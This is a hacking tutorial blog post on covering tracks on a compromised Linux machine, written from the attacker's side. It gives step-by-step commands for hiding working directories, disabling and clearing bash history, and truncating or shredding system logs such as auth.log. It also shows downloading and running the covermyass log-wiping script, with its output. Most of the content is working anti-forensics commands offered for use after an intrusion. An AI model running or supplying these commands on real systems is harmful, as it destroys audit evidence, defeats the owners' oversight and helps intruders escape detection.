Clear Logs and Bash History for Stealth

As a hacker, the final stage of exploitation is covering their tracks, which involves wiping all activity and logs so that they can avoid being detected. It's especially crucial for persistence if the target will be accessed again in the future by the attacker.

Step 1:Compromise a Target

The first thing we need to do is exploit the target. We can use command injection to abuse the way the server handles OS commands to get a shell. We'll also want to upgrade our new shell to a fully interactive one. Doing so will make it easier to work in general, and it will also let us use tab completion and terminal history.

After that, we can escalate our privileges to root so we can better take advantage of the system to remain undetected.

 

Step 2:Create an Easy-to-Delete Hidden Directory

Once we have root access, we can create a hidden directory to work out of and keep any scripts or files in. It won't fool anyone but the most noobie admin, but another layer of discretion certainly couldn't hurt. First, let's locate any writable directories with the following command:

root@kali:/# find / -perm -222 -type d 2>/dev/null
/dev/shm
/var/lock
/var/lib/php5
/var/tmp
/var/www/dav
/var/www/starwar/data/Sandbox
/var/www/starwar/data/Main
/var/www/starwar/data/Know
/var/www/starwar/data/starwar
/var/www/starwar/data/_default
/var/www/starwar/data/Trash
/var/www/starwar/public/Sandbox
/var/www/starwar/public/Main
/var/www/starwar/public/Know
/var/www/starwar/public/Know/IncorrectDllVersionW32PTH10DLL
/var/www/starwar/public/starwar
/var/www/starwar/public/starwar/starwarDocGraphics
/var/www/starwar/public/starwar/starwarTemplates
/var/www/starwar/public/starwar/starwarLogos
/var/www/starwar/public/starwar/PreviewBackground
/var/www/starwar/public/starwar/FileAttachment
/var/www/starwar/public/starwar/WabiSabi
/var/www/starwar/public/Trash
/var/www/starwar/public/icn
/tmp
/tmp/.ICE-unix
/tmp/.X11-unix

 

We can create a hidden directory with the mkdir command and by prepending the name with a dot:

root@kali:/# mkdir /dev/shm/.secretDir

 

If we list the contents of /dev/shm now, nothing shows up:

root@kali:/# ls -l /dev/shm/
total 0

 

Only when we use the -a switch to list all files and directories does it show up:

root@kali:/# ls -la /dev/shm/
total 0
drwxrwxrwt  3 root root    60 2019-06-19 13:49 .
drwxr-xr-x 13 root root 13480 2019-06-19 13:41 ..
drwxr-xr-x  2 root root    40 2019-06-19 13:49 .secretDir

 

To remove the directory once we are finished on the machine, use the rmdir command:

root@kali:/# rmdir /dev/shm/.secretDir/

 

Step 3: Delete the Bash History

Bash keeps a list of commands used in the current session in memory, so it's important to clear it to cover your tracks. We can view the current history with the history command:

root@kali:/# history
    1  cd /
    2  ls
    3  find / -perm -222 -type d 2>/dev/null
    4  cd /dev/shm/
    5  cd /
    6  mkdir /dev/shm/.secret
    7  ls -l /dev/shm/
    8  ls -la /dev/shm/
    9  ls
   10  rmdir /dev/shm/.secret/
   11  history

 

Commands are written to the HISTFILE environment variable, which is usually .bash_history. We can echo it to see the location:

root@kali:/# echo $HISTFILE
/root/.bash_history

 

We can use the unset command to remove the variable:

root@kali:/# unset HISTFILE

 

So when we echo it again, nothing shows up:

root@kali:/# echo $HISTFILE

 

We can also make sure the command history isn't stored by sending it to /dev/null. Set the variable to it:

root@kali:/# HISTFILE=/dev/null

 

Or do the same with the export command:

root@kali:/# export HISTFILE=/dev/null

 

And the history will now be sent to /dev/null (nowhere):

root@kali:/# echo $HISTFILE
/dev/null

 

We can set the number of commands to be stored during the current session to 0 using the HISTSIZE variable:

root@kali:/# HISTSIZE=0

 

Alternatively, use the export command:

root@kali:/# export HISTSIZE=0

 

We can also change the number of lines allowed in the history file using the HISTFILESIZE variable. Set this to 0:

root@kali:/# HISTFILESIZE=0

 

Or with export:

root@kali:/# export HISTFILESIZE=0z

 

The set command can be used to change shell options as well. To disable the history option, use the following command:

root@kali:/# set +o history

 

And to enable it again:

root@kali:/# set -o history

 

Similarly, the shopt command can be used to change shell options. To disable history, use the following command:

root@kali:/# shopt -ou history

 

And to enable it again:

root@kali:/# shopt -os history

 

While running commands on the target system, we can sometimes avoid saving them to history by starting the command with a leading space:

root@kali:~#  cat /etc/passwd

That technique doesn't work all the time and depends on the system.

 

We can also just clear the history using the -c switch:

root@kali:~# history -c

 

To make sure the changes are written to disk, use the -w switch:

root@kali:~# history -w

 

That will only clear the history for the current session. To absolutely make sure the history is cleared when exiting a session, the following command comes in handy:

root@kali:/# cat /dev/null > ~/.bash_history && history -c && exit

 

We can also use the kill command to exit the session without saving history:

root@kali:/# kill -9 $$

 

Step 4:Clear the Log Files

In addition to Bash history, log files also need to be wiped to remain undetected. Here are some common log files and what they contain:

  • /var/log/auth.log Authentication
  • /var/log/cron.log Cron Jobs
  • /var/log/maillog Mail
  • /var/log/httpd Apache

     

Of course, we can simply remove a log with the rm command:

root@kali:/# rm /var/log/auth.log

 

But that will likely raise red flags, so it's better to empty the file rather than erase it completely. We can use the truncate command to shrink the size to 0:

root@kali:/# truncate -s 0 /var/log/auth.log

Please note, truncate is not always present on all systems.

 

We can accomplish the same thing by echoing nothing into the file:

root@kali:/# echo '' > /var/log/auth.log

 

And also with > by itself to empty the file:

root@kali:/# > /var/log/auth.log

 

We can also send it to /dev/null:

root@kali:/# cat /dev/null > /var/log/auth.log

 

Or use the tee command:

root@kali:/# true | tee /var/log/auth.log

 

We can also use the dd command to write nothing to the log file:

root@kali:/# dd if=/dev/null of=/var/log/auth.log
0+0 records in
0+0 records out
0 bytes (0 B) copied, 6.1494e-05 s, 0.0 kB/s

 

The shred command can be used to overwrite a file with meaningless binary data:

root@kali:/# shred /var/log/auth.log

 

We can even tack on -zu which will truncate the file and overwrite it with zeros to hide evidence of shredding:

root@kali:/# shred -zu /var/log/auth.log

 

Step 5: Use a Tool to Ensure Things Are Erased

To increase the chances that any activity on the target goes undiscovered, we can use a tool to make sure everything gets erased. Covermyassis a script that will automate much of the processes we've already covered, including clearing log files and disabling Bash history.

We can grab the script from GitHub using wget (assuming we have access to the internet on the target, otherwise, it will have to be transferred manually):

root@kali:/# wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass

 

Head to a writable directory, and use chmod to make it executable:

root@kali:/tmp# chmod +x covermyass

 

Then we can run it:

root@kali:/tmp# ./covermyass
Welcome to Cover my ass tool !
Select an option :
1) Clear logs for user root
2) Permenently disable auth & bash history
3) Restore settings to default
99) Exit tool
>

 

We're given a custom prompt with a few options to choose from. Let's select the first one to clear the logs:

> 1
[+] /var/log/messages cleaned.
[+] /var/log/auth.log cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.
Reminder: your need to reload the session to see effects.
Type exit to do so.

 

We can also disable Bash and auth history with option 2:

> 2
[+] Permanently sending /var/log/auth.log to /dev/null
[+] Permanently sending bash_history to /dev/null
[+] Set HISTFILESIZE & HISTSIZE to 0
[+] Disabled history library
Permenently disabled bash log.

 

And in case you need to clear everything in a hurry, simply append now to the command:

root@kali:/tmp# ./covermyass now
[+] /var/log/messages cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.
Reminder: your need to reload the session to see effects.
Type exit to do so.

 

so, we explored various techniques used to cover tracks and remain undetected on a compromised machine. We covered ways to disable and delete Bash history, methods to clear log files, and utilized the Covermyass tool to ensure our activity on the target was wiped. There are other ways to clear certain traces of an attack, like using Metasploit, using shell scripting, or doing it on a hacked Windows machine, but the above should be everything you need for a basic Linux computer.

 

I hope you found How to Clear Logs and Bash History article helpful! If you have any questions about this guide, please leave a comment below or reach out to me on Twitter@amrelsagaei

 

Leave a comment

Your email address will not be published. Required fields are marked *